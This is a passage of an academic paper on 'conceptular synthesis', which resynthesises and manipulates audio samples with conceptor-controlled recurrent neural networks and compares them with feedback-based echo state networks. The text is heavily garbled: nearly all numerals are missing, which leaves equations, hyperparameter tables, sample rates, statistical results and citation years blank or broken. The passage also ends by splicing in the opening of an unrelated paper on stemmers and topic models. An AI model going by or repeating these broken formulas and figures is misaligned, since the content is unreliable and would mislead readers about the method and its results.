http://dx.doi.org/ . /peerj-cs. then explored in an experiment comparing conceptular synthesis to a baseline method using feedback induced oscillation. following this, extended sound synthesis options are described. conceptular synthesis techniques conceptular synthesis works by subdividing the audio training data into a set of sub- sequences, and learning an rnn and set of conceptors that can regenerate these sub- sequences, with the intention of resynthesising the audio sample by recombining the model-generated sequences. the audio training data may be a single audio sample, or it may be composed of multiple audio samples to create a model that will create variation between different samples. slicing training data two methods of slicing the audio were explored: using constant or variable values for the sub-sequence size µ. using constant µ, the sample is divided into a set of equal length signals a, of length µ samples each. the optimal value of µ for a particular sound sample can be determined programmatically through a grid search. the constant µ slicing method runs into problems, particularly when there are dominant frequencies in the source audio whose wavelength is longer than µ. slicing lower frequency waveforms at non-zero points creates high-frequency artefacts in the training data, which can distort the training process because these artefacts are not present in the original training material. for example, consider the kick drum waveform in fig. . the sample has low frequency components with varying long wavelengths, and there is no constant value of µ that will avoid slicing at non-zero points. to avoid this, the sample can be analysed using a zero-crossing detector, resulting in a set of points i at which the sample is sliced to create a set of driving audio signals a. i={n|y(n) > ∧y(n+ )< }. ( ) hyperparameters and training a key parameter is the reservoir size ψ.ψ correlates with the memory capacity of the reservoir; it should be at least equal to the number of independent variables needed for the task the model is being trained for (jaeger, ). as we increase the quantity and length of training signals, we need to increase ψ to give the model the capacity to learn them. however increasing ψ makes computation more expensive (at approximately o(n )), so there are practical limits to this value. the other key parameter is the leak rate α. lowering α has the effect of filtering out high frequencies in the reservoir activation levels x, and therefore slowing down the behaviour of the rnn. α needs to be chosen such that the model can reproduce the frequency content from the source audio, for example a sound with dominant low frequencies like the kick drum in fig. will need a network with slowly changing activations, and therefore a low α value. optimal values can be found using a grid search. after choosing hyperparameters, a model is trained using the techniques set out earlier in the paper. the output is a set of conceptors, calculated to reproduce each audio signal aj. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. time (samples) . . . . . . . am pl itu de original reconstruction figure a comparison of the original kick drum sample and the output of the trained ccrnn model. full-size doi: . /peerjcs. /fig- table hyperparameters in the resynthesis quality experiment. model type ψ α γw γinput γbias λ %w %out ccrnn { . , . ... . } . . . e− e− esnspf ... ... . ... ... e− e− resynthesis to resynthesise the training signal, the ccrnn is initially run for λ steps with the first conceptor c . the model is then run with each conceptor cj inserted into the update loop, as described in eqs. ( ) and ( ), to create a set of output signals q. the number of samples for which each conceptor is used in the runtime loop corresponds with the length of the audio signal from which the conceptor was trained. the algorithm makes a short linear crossfade between conceptors, over a small percentage of the pattern length. this prevents artefacts appearing from instantaneous switching of conceptors. finally, output signals are appended to create the waveform k=[q |q |...|qn]. example: resynthesis of kick drum the output of a trained conceptular synthesis model is now shown, to illustrate how this technique can be applied. a ccrnn model was trained to resynthesise a kick drum. the original audio (see fig. and audio s ) was re-sampled at hz (half of cd-quality), in order to reduce the cpu load of training. the sample was segmented using the zero-crossing method, and the model was trained with the parameters as shown in table , with leak rate α= . . the kick drum sample was resynthesised with the crossfade length set at % of signal length. the result is shown in figs. and , and included in audio s . both show a close reconstruction of the original, with the addition of some high frequency artefacts. this example is not compared quantitatively to the original, instead this is done systematically in the experiment below. measuring resynthesis quality we have seen the potential capabilities for conceptular synthesis to resynthesise audio from trained ccrnn models. these trained models offer extensive creative possibilities for sound synthesis, which are detailed later in the paper. before exploring these avenues, the quality of resynthesis method should be evaluated, in comparison to an existing baseline. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. [a] [b] figure spectrograms comparing the resynthesised kick drum (a) to the original sample (b). full-size doi: . /peerjcs. /fig- baseline models: echo state networks with stored patterns and feedback the closest comparable method to conceptular synthesis is to use esns with output feedback as trainable oscillators. feedback is used to guide reservoir dynamics to a stable limit cycle where the model is outputing a desired signal. early research on esns (jaeger, ) showed their capability for self-driven oscillation using output feedback. more recent research has focused on increasing the effectiveness of output feedback by adapting the weight matrix w to increase the accuracy of reproduced patterns. jaeger ( a) p summarises this family of techniques including self-prediction (mayer & browne, ), self-sensing networks (sussillo & abbott, ) and jaeger’s own method for storing patterns which has already been detailed in this paper. the reservoirs for both techniques are created using the same stored pattern method, but then the methods diverge. these baseline models will be referred to as esnspfs. the training method for esnspfs works as follows: a set of audio signals is stored in an rnn, using an identical approach as detailed earlier with eqs. ( ), ( ) and ( ). the result of this process is to adapt the randomly initialised weight matrix w∗ to trained matrix w . this model is now used for training a set of output weight matrices, such that each matrix w out j will be used to recreate audio signal aj. to train an esnspf using output feedback, we train an output layer that will predict the the next sample from the input signal. the model is driven with signal aj using eqs. ( ) and ( ). following a washout period, states x(n) from timesteps λ to λ+φ− to are stored in ψxφ− matrix x. samples from the audio signal aj from λ+ to λ+φ− are stored in x φ− matrix p. the output weight matrix w out j can then be calculated using eq. ( ). feedback models are sensitive to initial conditions; a brute force search can be used to find a good value for the initial state x( ), stored to use later as xcue. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. at runtime, the model is run by feeding the output back into the input with a modification of eq. ( ), starting from initial state xcue. to reproduce audio signal aj, the model is updated as follows: z(n+ )=wx(n)+w iny(n) ( ) x(n+ )=( −α)x(n)+αtanh(z(n+ )+b) ( ) y(n+ )=w out j x(n+ ) ( ) to recreate a sequence of patterns or grains that comprise a longer audio signal, each output matrix w out j is sequentially inserted to the runtime loop for a period matching the length of the audio signal aj. dataset sounds from the ixi lang data set (magnusson & kiefer, ) were used to compare the two methods. this is a collection of the sounds that accompanies the ixi lang live coding environment. the collection represents a wide variety of short samples that are used for live performance. there are audio clips, lasting between ms and . s (mean: . s). method each sample was resampled at , hz, normalised and scaled by half, and truncated to a maximum of , samples (or . s); this was to create a balance between computation demands on the model, and providing enough material to make a useful comparison. the sample was then sliced; the zero-crossing method (eq. ( )) was used as this is more widely applicable to a range of timbres. a maximum of patterns were kept from the slicing process, again to reduce demands on computation time and memory for storing conceptors. this process resulted in a set of patterns extracted from each sample in the dataset. esnspf and ccrnn models were trained to resynthesise each pattern set, and then used to resynthesise the corresponding samples. table shows the hyperparameters used for both models types, chosen to match the models as fairly as possible for comparison. some were fixed, others were searched for within the ranges shown. fixed hyperparameters were chosen based on experimental reports in wider literature (lukoševičius, ; jaeger, ; jaeger, b), and through extensive manual experimentation. some parameters were deemed to be sensitive to the training material, for example α needs to be tuned to match the frequencies in the source, in which case the values were optimised through automatic search as detailed below. the use of randomly determined weight values is fundamental to the design of both models, however this leads to variance in training results. to mitigate against this variance, the training process was run multiple times at each hyperparameter setting and the best models chosen. it is acknowledged that, as with all non-deterministically generated models, it is possible that the most optimal model will not be found, but running the training process multiple times will increase the possibility of finding a better model. further to this, variances in this process will be averaged out across the samples in the dataset. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ccrnn models the key hyperparameter for this model type was the leak rate α, which needed to be tuned to match the frequency response of the model with the frequencies needed for resynthesis of the training material. for each sample in the dataset, α was determined through a grid search (as recommended in (lukoševičius, , section . . )) of values { . , . , . ... . }. the grid search evaluated models at each of these settings at a lower model size ( ψ= ) in order to save computation time, evaluating different models and recording the best mfcc error. this process resulted in an optimal value of α which was used to evaluate models at a higher model size ( ψ= ). the highest score of these models was recorded. esnspf models models trained with output feedback showed sensitivity to four parameters: model size ψ, leak rate α, bias scaling γbias and input scaling γ input . interestingly, this technique showed sensitivity to ψ, while ccrnn models show consistent improvement with larger ψ. a four-dimensional grid search was impractical due to computational demands, instead a microbial genetic algorithm (harvey, ) was used to find optimal values, conducting a stochastic evolutionary search of parameters in the ranges shown in table . the fitness function selected the best model based on evaluations of models created with identical hyperparameters. each model was then evaluated with randomised starting states xcue, and the xcue with the lowest error was chosen. results the experiment resulted in an error score for each model type for each of the samples in the dataset. the two methods gave comparable results (fig. ) (ccrnn: mean . , median . , esnspf: mean . , median . ). there was no significant difference between the model types (wilcoxon signed rank test: w = ,p= . ). these results are discussed further below, after contextualisation within extended synthesis techniques. extended conceptular synthesis techniques the above experiment demonstrates that ccrnn models are capable of sound synthesis quality comparable to esnspfs. moving beyond this baseline, they offer a wider range of creative sound synthesis possibilities. extended sound synthesis parameters the sound generation algorithm can be manipulated with three key parameters: speed, leak rate scale, and weight scaling. the speed parameter changes the amount of time in which the algorithm waits until a new conceptor is plugged in to the rnn update loop. for example, a speed of . results in two cycles of a pattern being played for each conceptor cj and resulting in a rendered sample that is twice the length of the original. at negative speeds, a sample can be crudely reversed by playing the patterns in reverse sequence. this parameter can have the effect of timestretching, i.e., extending or compressing the length of a sound, independent from its pitch. audio s presents an example of timestretching from % up to % in % steps with a ccrnn model trained on a kick drum sample. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. . . . . . . . mfcc error ccrnn esnspf m od el figure a violin plot of mfcc error scores for each model type, for resynthesis of samples in the ixi lang dataset. the plot shows the distribution of scores, with real values marked by vertical lines. full-size doi: . /peerjcs. /fig- the leak rate α can be scaled during resynthesis, by updating eq. ( ) as follows: α scaled =αξ α ( ) x(n+ )=( −αscaled)xtarget (n)+αscaledtanh(xtarget (n+ )+b) ( ) ξα becomes an useful parameter in resynthesis for control over timbre and pitch (which is explained later when discussing pitch-controlled oscillators). it should be limited such that α stays between and . weight scaling can be introduced by updating eq. ( ) so that the weight matrix is linearly scaled by scalar ξw : w scaled =wξw ( ) z(n+ )=w scaledx(n)+w ina(n+ ) ( ) this causes timbral changes in the rendered sample whose characteristics are based on the random make up of the rnn. there is some consistency in this parameter in that when raised, more high frequency content tends to be introduced. at higher values, the rnn can behave in musically interesting non-linear ways. below a lower limit (model dependent), the model output tends towards silence. further manipulations of sound can be achieved by manipulating conceptors. extending sound synthesis with conceptor logic the use of conceptor logic and conceptor manipulation is where this mode of sound synthesis significantly moves on from standard granular synthesis features, and brings its own unique possibilities. new conceptors can be created using boolean logic rules; jaeger ( b, p. ) defines formulae for and, or and not operations. boolean operations provide a system of logic with which to combine conceptors, with applications in classification and memory management. in the case of conceptular synthesis, logic operations provide a wide range of creative possibilities. conceptors can be logically recombined to create new timbral variations. two examples are now given: kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. time (samples) . . . . . . . . am pl itu de original resynthesis figure the waveform of a variant of a snare sample, produced using boolean logic cj = c j ∨ cj+ ∨ cj+ ∨cj+ . full-size doi: . /peerjcs. /fig- time (samples) . . . . . . . a m pl itu de figure waveforms showing generative variants of the snare sample, using the boolean logic rule cj = c j ∨crandom ∨crandom . full-size doi: . /peerjcs. /fig- example a ccrnn model was trained to reproduce a snare sample (audio s ). each conceptor in the snare model cj was combined with the subsequent three conceptors to make a new set c , using the rule c j =c j ∨cj+ ∨cj+ ∨cj+ this resulted in a variant on the original snare sound shown in fig. (audio s ). example a new set of conceptors c was made by combining each conceptor in the set with a random choice of two other conceptors in the set cj =c j ∨crandom ∨crandom . this is designed with the intention of keeping the main structure of the sample but introducing random variations. fig. shows the resulting waveforms from separate iterations of this process using the snare model detailed above (audio s ). in both these examples, the variations are subtle, and the renderings suffer from some audible artefacts, however this does point to generative possibilities that are worthy of further research. sound morphing with interpolated conceptors jaeger ( b) p. demonstrated shape morphing between heterogeneous patterns using conceptors. this same technique can be applied within conceptular synthesis to morph between sounds. it is not within the scope of this paper to analyse the quality of sound morphing using conceptular synthesis in comparison to other techniques, rather just to demonstrate that sound morphing is a creative possibility with ccrnns, and to outline how it can be achieved. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. morphing can be implemented by creating a linear combination of conceptors to interpolate between the two patterns the conceptors were trained to recreate. equation ( ) shows how this can be done with two conceptors, where ω is the morphing factor. x(n+ )=(( −ω)ci+ωcj)tanh(wx(n)+b) ( ) varying ω between and forces the rnn to create a morph between the patterns represented by the two conceptors. when ≤ω≤ , the mix of conceptors will interpolate between patterns. however, when ω is outside of this range, the mix of conceptors can extrapolate between patterns. the intention of morphing between sounds is to create a new mixture of sounds that retains the shared perceptual properties of the original sources (slaney, covell & lassiter, ). morphing was investigated with conceptular synthesis by training a ccrnn recreate patterns from two different samples: the snare sample already discussed, and a short bongo sample (audio s ). an -node network was trained for recreation of individual patterns (fixed length ) for each sample, resulting in two sets of conceptors, csnare and cbongo. morphing was achieved by creating a new set of conceptors based on a linear mixture of the trained conceptors, for each pattern segment. the results demonstrate a morph between samples that is different from a linear mixture of the two samples. figure s shows how the time-domain waveform result varies over an point morph from ω= to ω= , and the result can be heard in audio s . for comparison, fig. s and audio s demonstrate a linear mix between amplitude values with the same two samples. boolean conceptor logic can also be used for sound morphing. for example, a set of conceptors cbongosnare was created, with each element combining elements from the snare and the bongo cjbongosnare =c j bongo∨c j snare. a sample rendered with this conceptor set contains characteristics of both sounds (audio s ). equivalent techniques with esnspf models where possible, equivalent extended sound manipulation techniques were attempted with esnspf models. there is no parallel using esnspf models for conceptor logic. however, it is possible to manipulate ξα and ξw during resynthesis, and also to introduce the same timestretching mechanism as for ccrnn models. attempts at all of these methods however did not lead to satisfactory results. timestretching with esnspfs only works when slowing down playback at integer subdivisions of the original speed. at other ratios, the models tend to quickly converge to silence. when altering ξα and ξw , the models tend towards producing high-amplitude artefacts. to demonstrate this, all models trained in the experiment above were tested with either ξα or ξw set to values { . , . ... . }. figure shows the average percentage change in standard deviation of amplitudes of resynthesised waveforms compared to a waveforms generated with ξα= and ξw = . for esnspfs, this change in standard deviation is high compared to the same measurement for conceptular synthesis models, reflecting high amplitude artefacts introduced by the change in these values. ccrnn models however remain close to the original amplitude range (although with some very small variation). kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . . . . scalew / scaleα % ch an g e in σ feedback models, scaleα feedback models, scalew conceptor models, scaleα conceptor models, scalew figure demonstration of the effects of ξα and ξw on waveform amplitude, reflecting high-amplitude artefacts in the esnspf models. full-size doi: . /peerjcs. /fig- discussion this work demonstrates how ccrnns can be used to resynthesise short samples by dividing the sample up into short signals and training a conceptor for the reproduction of each one. an experiment on resynthesising the ixi lang dataset show that conceptular synthesis can achieve comparable resynthesis quality to echo state network models that use stored patterns and feedback, when measured using mfccs. both types of model could not perfectly reproduce the training samples, but were able to make reasonable reconstructions. there was some variance in resynthesis quality across the results, the causes of which are the topic of future investigation. ccrnn models offer malleable sound synthesis possibilities when manipulated using inherent runtime parameters and through conceptor combinations created either by interpolation or by boolean logic. these techniques provide unsatisfactory results when attempted with equivalent implementations in esnspf models. this is likely to be due to the high sensitivity to initial conditions of models that use output feedback. while they can provide good quality resynthesis, esnspf models are brittle in nature, while ccrnns show themselves to be highly robust to manipulation during resynthesis, making them extremely valuable as creative tools. there is natural variability between models, due to random initialisation of the rnn. this variability is minimised when using the network within normal constraints, however when pushed into non-linear modes of behaviour by, for example, changing the value of ξw , a higher variability between different ccrnns can be observed. this behaviour for a particular network may turn out to be musically interesting, lending conceptular synthesis potential for serendipitous discovery of new sounds, and a level of generative unpredictability that is often valued by musicians (mccormack et al., ). is it possible that, by using the reconstruction error as the evaluation metric, this experiment has produced models that are flawed because of overfitting? in this context, overfitting would be the production of generative models that are only useful for reproducing the training data, but do not function well as malleable creative tools when manipulated using the techniques described above, ie. they would have a limited aesthetic state space (eldridge, ). conventionally in esn research, the complexity of reservoirs, approximately determined by the size of n , has been established as a factor in overfitting in discriminative models (wyffels & schrauwen, ); however, there is very little research on the nature of overfitting in generative esns and related models, especially with regards kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. to creating malleable models. jaeger acknowledges that there are open questions around the concept of overfitting (jaeger, ). the experimental results do not indicate that n is a factor in overfitting in this experiment. in the search for esnspf models, n was optimised through evolutionary search. the resulting values of n follow an approximately flat distribution across the search range (mean , std: ). if higher n resulted in higher scoring (but overfitted) models, these values would have been skewed towards larger model sizes. further investigation revealed no significant correlation between n and reconstruction error. the measurement of high amplitude artefacts produced by manipulation of ξα and ξw (as detailed above) could be taken as a metric for basic malleability. there was no significant correlation between n and the level of artefacts, overall showing a lack of evidence for a connection between n and the possible effects of overfitting in esnspfs. ccrnn models were produced with a fixed n , and have shown themselves to be highly malleable in the examples detailed in this project. when producing generative reservoir models, increasing n could give the model more opportunity for varied dynamical behaviours rather than limiting scope; it’s certain that overfitting in generative reservoir models is a nebulous concept that warrants future attention. an audio synthesis process would ideally run in realtime. in this example, the rendering was carried out on a cpu, and was around times slower than realtime. while this leaves much room for improvement, it should be noted that this version was not optimised for speed, and a dedicated c++ or gpu renderer is expected to be faster than the python version used here. it does however show the scale of computation involved in this method of sound synthesis, and indicates that computational resources are a challenge in this area. conclusions and future work the experiments presented here show how recurrent neural networks under conceptor control, as originally described in (jaeger, b), can be configured, trained and run as sample-level sound synthesisers. conceptular synthesis is an extension of granular synthesis, where a ccrnn is trained to reproduce very short segments of a sound sample using conceptors to recall the different patterns. it is controlled at runtime to recombine these short segments into a longer continuous sound. the models were not limited to straight- forward sound reproduction; ccrnns presented a large variety of creative options for synthesising new sounds based on the training materials. techniques included classic granular synthesis methods: timestretching and compression, and creative recombination of grains. techniques were extended by the new possibilities of combining conceptors, using boolean conceptor logic, and using linear combinations of conceptors to morph between signals. the leak rate of rnn nodes and the rnn spectral radius can be manipulated at runtime to create new sonic possibilities. ccrnns were shown to have similar resynthesis quality to baseline esnspf models, when compared using mfccs. ccrnns however excelled in their possibilities for creative sound manipulation, compared to esnspfs which produced either significant artefacts or silence when manipulated. the experiments outlined common limitations of ccrnn models for sound synthesis. there was always some high-frequency loss in the reproduction of the original driving kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. audio signals, some further experimentation is needed to discover the source of this issue. issues with high frequencies are affected by the choice of leak rate α, which needs to be chosen carefully to slow down rnn dynamics for reproduction of low frequency patterns, while also preserving enough high-frequency dynamics. it’s possible that oversampling may help, although the efficiency impact of oversampling could be significant considering the high computational cost of training and running these models. this work helps to answer the questions posed at the beginning of the paper concerning the fundamental capability of conceptors to synthesise audio signals. conceptors are able to generate longer patterns needed for audio signals at reasonable sample rates, as demonstrated by resynthesis of simple sine-like patterns up to samples long in the example of the kick drum, and resynthesis of varied audio materials in the ixi lang dataset. these pattern lengths are relatively short but useful enough for sound synthesis. as pattern lengths extend, pragmatic limits on computational resources limit further exploration. the resynthesis quality experiment established that when training models with multi-timbre sounds, there is variance in the ability of ccrnn models to reproduce these sounds accurately, indicating sensitivity in ccrnns to sonic qualities in the source materials. it’s not clear yet what this relationship is; this should be the topic of further investigations. conceptular synthesis required large models (of approximately nodes upwards) to produce reasonable results, resulting in slow resynthesis times. the large size of these models was required for them to be able to learn either long patterns or high volumes or short patterns. the technique ran at around times slower than realtime. the memory requirements for conceptular synthesis were particularly large, as a conceptor was needed to reproduce each training signal, resulting in model sizes between . and gb in the experiments above. these computation requirements still may be considered lightweight compared to some deep learning sound-synthesis techniques, nevertheless it would be a considerable success if these models could be optimised to reach realtime at reasonable sample rates. recent research into deep architectures in echo state networks may offer promise for increasing computational efficiency, as they have been shown to have better memory capacity compared to classical esns with similar numbers of nodes (gallicchio, micheli & silvestri, ). more broadly, the relationship between memory capacity and computation time will be a limit on sound synthesis with ccrnns and their potential to move beyond short sound samples, until methods are found to change architectures and reduce this dependency. this initial demonstration of the potential of sound synthesis with ccrnns stimulates further questions. future research should establish: . how these techniques can be scaled upwards to facilitate learning models of longer sound samples; . the causes of variance in resynthesis quality when training models with signals of varied timbre; . whether high-frequency loss in resynthesis can be resolved; . how to optimise the rnn leak rate α for sounds with wide frequency ranges; . how the techniques identified in this paper can be extended for the purpose of generative sound synthesis; kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . how to optimise network architectures to achieve closer-to-realtime performance; . how to conceptualise overfitting, in the context of producing creatively malleable generative models; . potential for use with analysis and resynthesis in the spectral domain (as we are seeing with systems such as nsynth (engel et al., ), gansynth (engel et al., )). conceptually, ccrnn architectures could be creatively compelling for computer musicians; it can sometimes be challenging to create believable and coherent complexity with standard digital sound generation and editing tools. with ccrnns, complexity comes for free and needs to be managed instead of created. the models presented here are inherently variable, and can be easily encouraged towards unpredictability and nonlinearity, creating sometimes surprising and serendipitous results. the models offer plenty of entry points for creative manipulation, with a potentially wide aesthetic state space (eldridge, ). the musician must interact with these models, rather than control them. the experiments presented here have mapped out initial explorations into sound synthesis with ccrnns. they extend a classical sound synthesis method, bringing boolean logic, pattern morphing and non-linear modulation possibilities into granular-style synthesis. the techniques exhibit some limitations that require further investigation, but also show unique creative possibilities for musicians, and rich potential for further research in this area. acknowledgements thank you to sussex humanities lab for generous access of their computing facilities. additional information and declarations funding the author received no funding for this work. competing interests the author declares there are no competing interests. author contributions • chris kiefer conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: code is available at github: https://github.com/chriskiefer/conceptorsoundsynthesis https://github.com/chriskiefer/conceptularbeatsynth. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/chriskiefer/conceptorsoundsynthesis https://github.com/chriskiefer/conceptularbeatsynth http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references donahue c, mcauley j, puckette m. . synthesizing audio with generative adversarial networks. arxiv preprint. arxiv: . . duport f, smerieri a, akrout a, haelterman m, massar s. . fully analogue photonic reservoir computer. scientific reports : doi . /srep . eldridge a. . you pretty little flocker: exploring the aesthetic state space of creative ecosystems. artificial life ( ): – doi . /artl_a_ . engel j, agrawal kk, chen s, gulrajani i, donahue c, roberts a. . gansynth: adversarial neural audio synthesis. arxiv preprint. arxiv: . . engel j, resnick c, roberts a, dieleman s, eck d, simonyan k, norouzi m. . neural audio synthesis of musical notes with wavenet autoencoders. arxiv preprint. arxiv: . . fernando c, sojakka s. . pattern recognition in a bucket. in: european conference on artificial life. berlin, heidelberg: springer, – . fiebrink r. . real-time human interaction with supervised learning algorithms for music composition and performance. phd thesis, princeton university. gabor d. . acoustical quanta and the theory of hearing. nature ( ): – doi . / a . gallicchio c, micheli a, silvestri l. . local lyapunov exponents of deep echo state networks. neurocomputing : – doi . /j.neucom. . . . gast r, faion p, standvoss k, suckro a, lewis b, pipa g. . encoding and decoding dynamic sensory signals with recurrent neural networks: an application of concep- tors to birdsongs. biorxiv . ghedini f, pachet f, roy p. . creating music and texts with flow machines. in: multidisciplinary contributions to the science of creative thinking. singapore: springer, – . hamel p, eck d. . learning features from music audio with deep belief networks. in: proceedings of the international society of music information retrieval, vol. . the netherlands: utrecht, – . harvey i. . the microbial genetic algorithm. in: european conference on artificial life. berlin: springer, – . holzmann g. a. echo state networks with filter neurons and a delay and sum readout. neural networks ( ): – . holzmann g. b. reservoir computing: a powerful black-box framework for nonlinear audio processing. in: dafx. ianigro sc, bown o. . exploring continuous time recurrent neural networks through novelty search. in: luke dahl, douglas bowman tm, eds. proceedings of the international conference on new interfaces for musical expression. blacksburg: virginia tech, – . kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://arxiv.org/abs/ . http://dx.doi.org/ . /srep http://dx.doi.org/ . /artl_a_ http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . / a http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. jaeger h. . short term memory in echo state networks. technical report. fraunhofer institute for autonomous intelligent systems. jaeger h. . a tutorial on training recurrent neural networks, covering bppt, rtrl, ekf and the ‘‘echo state network’’ approach. technical report. fraunhofer institute for autonomous intelligent systems. jaeger h. . the ‘‘echo state’’ approach to analysing and training recurrent neural networks-with an erratum note. technical report . bonn, germany: german national research center for information technology gmd. jaeger h. a. conceptors: an easy introduction. arxiv preprint. arxiv: . . jaeger h. b. controlling recurrent neural networks by conceptors. arxiv preprint. arxiv: . . jaeger h. . using conceptors to manage neural long-term memories for temporal patterns. journal of machine learning research ( ): – . jaeger h, eck d. . can’t get you out of my head: a connectionist model of cyclic rehearsal. in: zif workshop. – . jaques n, gu s, bahdanau d, hernández-lobato jm, turner re, eck d. . sequence tutor: conservative fine-tuning of sequence generation models with kl-control. arxiv preprint. arxiv: . . jensen jh, christensen mg, ellis dp, jensen sh. . quantitative analysis of a com- mon audio similarity measure. ieee transactions on audio, speech, and language processing ( ): – . jones b, stekel d, rowe j, fernando c. . is there a liquid state machine in the bacterium escherichia coli? in: ieee symposium on artificial life, hawaii, usa. piscataway: ieee. keuninckx l, danckaert j, van der sande g. . real-time audio processing with a cascade of discrete-time delay line-based reservoir computers. cognitive computation ( ): – doi . /s - - - . khunarsal p, lursinsap c, raicharoen t. . very short time environmental sound classification based on spectrogram pattern matching. information sciences : – . kiefer c. . musical instrument mapping design with echo state networks. in: nime ’ : proceedings of the th international conference on new interfaces for musical expression. lukoševičius m. . a practical guide to applying echo state networks. in: neural networks: tricks of the trade. berlin: springer, – . maass w, natschläger t, markram h. . real-time computing without stable states: a new framework for neural computation based on perturbations. neural computation ( ): – . magnusson t, kiefer c. . dataset of sounds used with the ixi lang live coding en- vironment. available at https://sussex.figshare.com/articles/dataset_of_sounds_used_ with_the_ixi_lang_live_coding_environment/ doi . /sussex. .v . mayer nm, browne m. . echo state networks and self-prediction. in: international workshop on biologically inspired approaches to advanced information technology. – . kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - https://sussex.figshare.com/articles/dataset_of_sounds_used_with_the_ixi_lang_live_coding_environment/ https://sussex.figshare.com/articles/dataset_of_sounds_used_with_the_ixi_lang_live_coding_environment/ http://dx.doi.org/ . /sussex. .v http://dx.doi.org/ . /peerj-cs. mccormack j, eldridge a, dorin a, mcilwain p. . generative algorithms for making music: emergence, evolution, and ecosystems. in: dean rt, ed. the oxford handbook of computer music. oxford handbooks. oxford: oxford university press. mehri s, kumar k, gulrajani i, kumar r, jain s, sotelo j, courville a, bengio y. . samplernn: an unconditional end-to-end neural audio generation model. arxiv preprint. arxiv: . . mudd t. . nonlinear dynamics in musical interactions. phd thesis, the open university. available at http://oro.open.ac.uk/ / . oord avd, dieleman s, zen h, simonyan k, vinyals o, graves a, kalchbrenner n, senior a, kavukcuoglu k. . wavenet: a generative model for raw audio. arxiv preprint. arxiv: . . pampalk e, dixon s, widmer g. . on the evaluation of perceptual similarity measures for music. in: of: proceedings of the sixth international conference on digital audio effects (dafx- ). – . roads c. . automated granular synthesis of sound. computer music journal ( ): – . roads c. . microsound. cambridge: mit press. sanfilippo d, valle a. . feedback systems: an analytical framework. computer music journal ( ): – . schrauwen b, verstraeten d, van campenhout j. . an overview of reservoir computing: theory, applications and implementations. in: proceedings of the th european symposium on artificial neural networks. – . schwarz d. . concatenative sound synthesis: the early years. journal of new music research ( ): – . slaney m, covell m, lassiter b. . automatic audio morphing. in: acoustics, speech, and signal processing, . icassp- . conference proceedings., ieee international conference, on vol. . piscataway: ieee, – . sussillo d, abbott l. . transferring learning from external to internal weights in echo-state networks with sparse connectivity. plos one ( ):e doi . /journal.pone. . tidemann a, demiris y. . groovy neural networks. in: proceeding of the conference on ecai : th european conference on artificial intelligence. truax b. . real-time granular synthesis with the dmx- . in: berg p, ed. proceedings of the international computer music conference. the hague: computer music association. truax b. . discovering inner complexity: time shifting and transposition with a real- time granulation technique. computer music journal ( ): – . wyffels f, schrauwen b. . a comparative study of reservoir computing strategies for monthly time series prediction. neurocomputing ( ): – . subspace learning/selected papers from the european symposium on time series prediction doi . /j.neucom. . . . wyse l. . real-valued parametric conditioning of an rnn for interactive sound synthesis. in: th international workshop on musical metacreation, international conference on computational creativity (iccc). kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://oro.open.ac.uk/ / http://arxiv.org/abs/ . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. xenakis i. . formalized music. bloomington: indiana university press. yee-king mj, fedden l, d’inverno m. . automatic programming of vst sound synthesizers using deep networks and other techniques. ieee transactions on emerging topics in computational intelligence ( ): – . kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. comparing apples to apple: the effects of stemmers on topic models alexandra schofield cornell university ithaca, ny xanda@cs.cornell.edu david mimno cornell university ithaca, ny mimno@cornell.edu abstract rule-based stemmers such as the porter stem- mer are frequently used 